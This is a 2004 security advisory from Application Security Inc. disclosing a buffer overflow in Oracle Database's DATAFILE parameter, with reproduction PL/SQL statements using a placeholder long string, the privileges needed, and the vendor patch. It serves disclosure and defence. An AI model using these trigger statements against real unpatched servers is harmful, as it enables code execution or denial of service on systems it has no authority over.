Application Security Inc. - Securing Business by Securing Enterprise Applications

home

client login

partner login

purchasing info

search:

add this

1.	Defending Against New and Emerging Database Threats
2.	Top Database Vulnerabilities Federal Agencies Face
3.	Solution Brief - Reviewing Database User Rights
4.	SOX Compliance and Database Security
5.	Grounding PCI Compliance in the Databasel

#21 - Buffer overflow on DATAFILE parameter

August 31, 2004

Credit: These vulnerabilities were researched and discovered by Cesar Cerrudo of Application Security, Inc.

Risk level: Low

Details:
Oracle Database Server allows specifying data files where the data will be stored when creating a database, altering an index etc. When a long string is passed to DATAFILE parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

ALTER DATABASE datafile 'longstringhere' ONLINE;

ALTER INDEX indexname allocate extent(datafile 'longstringhere');

CREATE TABLESPACE tablespacename DATAFILE 'longstringhere';

ALTER CLUSTER clustername allocate extent(datafile 'longstringhere');

etc.

Analysis:
This vulnerability can be exploited in many ways:

using ALTER INDEX statement by users who have their own schema and users with ALTER ANY INDEX system privilege
using ALTER DATABASE by users with the ALTER DATABASE system privilege
using CREATE TABLESPACE by users with CREATE TABLESPASE system privilege
using ALTER CLUSTER by users who have their own schema and users with ALTER ANY CLUSTER system privilege

Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause DOS (Denial of service) killing Oracle server process.

Vendor Fix:
Fixed in latest Oracle 9ir2 Patchset 4 (9.2.0.5) patch 2. 10g not vulnerable.